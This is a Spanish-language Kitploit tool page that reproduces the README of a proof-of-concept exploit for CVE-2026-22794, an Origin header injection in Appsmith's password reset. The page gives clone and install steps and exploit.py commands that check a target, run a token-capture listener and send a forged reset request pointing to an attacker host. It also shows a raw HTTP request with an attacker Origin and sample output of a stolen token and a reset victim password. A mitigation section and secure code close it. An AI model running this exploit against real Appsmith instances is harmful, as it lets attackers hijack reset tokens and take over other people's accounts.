Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/malikhamza7/cve-2026-22794-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAutenticación
GitHubmalikhamza7/cve-2026-22794-poc

CVE-2026-22794-POC

🔴 CVE-2026-22794 - Toma de control de cuenta en el restablecimiento de contraseña de Appsmith mediante inyección de cabecera Origin | PoC Exploit + Plantilla Nuclei

Ver RepositorioSitio web
7hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-22794 - Inyección de Encabezado Origin en Appsmith

Python Version CVE License

🔴 Vulnerabilidad de Seguridad Crítica

Secuestro del Enlace de Restablecimiento de Contraseña mediante Manipulación del Encabezado Origin

Este repositorio contiene una Prueba de Concepto (PoC) del exploit para CVE-2026-22794, una vulnerabilidad crítica en Appsmith que permite a los atacantes secuestrar tokens de restablecimiento de contraseña y lograr la toma total de la cuenta.

📋 Resumen de la Vulnerabilidad

CampoValor
ID CVECVE-2026-22794
Software AfectadoAppsmith (versiones anteriores al parche)
Tipo de VulnerabilidadInyección de Encabezado Origin
ImpactoToma Total de la Cuenta
Puntuación CVSS9.1 (Crítico)
Vector de AtaqueRed
Complejidad del AtaqueBaja
Privilegios RequeridosNinguno
Interacción del UsuarioRequerida (la víctima hace clic en el enlace)

🎯 Descripción de la Vulnerabilidad

Appsmith utiliza el encabezado HTTP Origin sin validación para construir las URL de restablecimiento de contraseña y verificación de correo electrónico. El código vulnerable asigna directamente el encabezado Origin a la URL base de restablecimiento de contraseña:

root@kitploit:~
userPasswordDTO.setBaseUrl(originHeader);

Esto permite a un atacante:

  1. Activar un restablecimiento de contraseña para cualquier dirección de correo electrónico
  2. Inyectar un encabezado Origin malicioso que apunte a un servidor controlado por el atacante
  3. Capturar el token de restablecimiento de contraseña cuando la víctima hace clic en el enlace
  4. Usar el token para restablecer la contraseña de la víctima y tomar el control de su cuenta

🔥 Cadena de Ataque

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                     FLUJO DEL ATAQUE                             │
└─────────────────────────────────────────────────────────────────┘

  ┌──────────┐                    ┌──────────┐                    ┌──────────┐
  │ ATACANTE │                    │ APPSMITH │                    │  VÍCTIMA │
  └────┬─────┘                    └────┬─────┘                    └────┬─────┘
       │                               │                               │
       │ 1. POST /forgotPassword       │                               │
       │    Origin: attacker.com       │                               │
       │    email: [email protected]     │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │                               │ 2. Enviar correo con          │
       │                               │    attacker.com/reset?token   │
       │                               │──────────────────────────────>│
       │                               │                               │
       │ 3. La víctima hace clic       │                               │
       │<──────────────────────────────────────────────────────────────│
       │                               │                               │
       │ 4. ¡Token capturado!          │                               │
       │                               │                               │
       │ 5. POST /resetPassword        │                               │
       │    token: STOLEN_TOKEN        │                               │
       │    password: attacker123      │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │ 6. ¡TOMA DE CUENTA! ✓         │                               │
       │                               │                               │

📦 Instalación

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/MalikHamza7/CVE-2026-22794-POC
cd CVE-2026-22794-POC

# Instalar dependencias
pip install -r requirements.txt

🚀 Uso

Verificar si el objetivo es vulnerable

root@kitploit:~
python exploit.py --target https://appsmith.target.com --check

Iniciar servidor de captura de tokens

root@kitploit:~
python exploit.py --listen --port 8080

Enviar solicitud maliciosa de restablecimiento de contraseña

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com

Ataque automatizado completo

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com \
    --listen --port 8080

Usar el token capturado para restablecer la contraseña

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --reset-token CAPTURED_TOKEN \
    --new-password "NewP@ssw0rd!"

📸 Demostración del Ataque

Paso 1: El atacante envía una solicitud maliciosa

root@kitploit:~
POST /api/v1/users/forgotPassword HTTP/1.1
Host: appsmith.target.com
Origin: https://attacker-server.com
Content-Type: application/json

{
  "email": "[email protected]"
}

Paso 2: La víctima recibe un correo con un enlace malicioso

root@kitploit:~
Enlace de Restablecimiento de Contraseña: https://attacker-server.com/user/resetPassword?token=abc123xyz...

Paso 3: El atacante captura el token

root@kitploit:~
[+] ¡SOLICITUD ENTRANTE CAPTURADA!
[*] Ruta: /user/resetPassword?token=abc123xyz789...
[!!!] ¡TOKEN DE RESTABLECIMIENTO DE CONTRASEÑA CAPTURADO!
[!!!] Token: abc123xyz789...

Paso 4: Toma de la cuenta

root@kitploit:~
[+] ¡TOMA DE CUENTA EXITOSA!
[+] La contraseña ha sido restablecida a: NewP@ssw0rd!

🛡️ Mitigación

Las organizaciones que utilizan Appsmith deberían:

  1. Actualizar inmediatamente a la última versión parcheada
  2. Validar los encabezados Origin contra una lista blanca de dominios permitidos
  3. Usar configuración del lado del servidor para generar las URL de restablecimiento de contraseña
  4. Implementar verificación adicional (por ejemplo, validación de IP, expiración corta del token)

Ejemplo de Código Seguro

root@kitploit:~
// ❌ CÓDIGO VULNERABLE
userPasswordDTO.setBaseUrl(originHeader);

// ✅ CÓDIGO SEGURO
String configuredBaseUrl = applicationConfiguration.getBaseUrl();
// O validar contra la lista blanca
if (!allowedOrigins.contains(originHeader)) {
    throw new InvalidOriginException("Invalid origin header");
}
userPasswordDTO.setBaseUrl(configuredBaseUrl);

📁 Estructura del Repositorio

root@kitploit:~
CVE-2026-22794/
├── README.md           # Este archivo
├── exploit.py          # Script principal del exploit
├── requirements.txt    # Dependencias de Python
├── LICENSE             # Licencia MIT
└── docs/
    └── technical_analysis.md  # Análisis técnico detallado de la vulnerabilidad

⚠️ Aviso Legal

Esta herramienta se proporciona únicamente con fines de pruebas de seguridad autorizadas y educativos.

  • Utilice esta herramienta únicamente contra sistemas que posea o para los cuales tenga permiso escrito explícito para realizar pruebas
  • El acceso no autorizado a sistemas informáticos es ilegal
  • El autor no es responsable del mal uso de esta herramienta
  • Siga siempre las prácticas de divulgación responsable

📄 Referencias

  • CVE-2026-22794
  • OWASP - Hoja de Referencia para Contraseñas Olvidadas
  • CWE-346: Error de Validación de Origin

👤 Autor

Investigador de Seguridad

  • GitHub: @MalikHamza7
  • LinkedIn: Tu Perfil de LinkedIn

📜 Licencia

Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para más detalles.


⭐ Si te resultó útil, ¡por favor dale una estrella al repositorio! ⭐

Descargar herramienta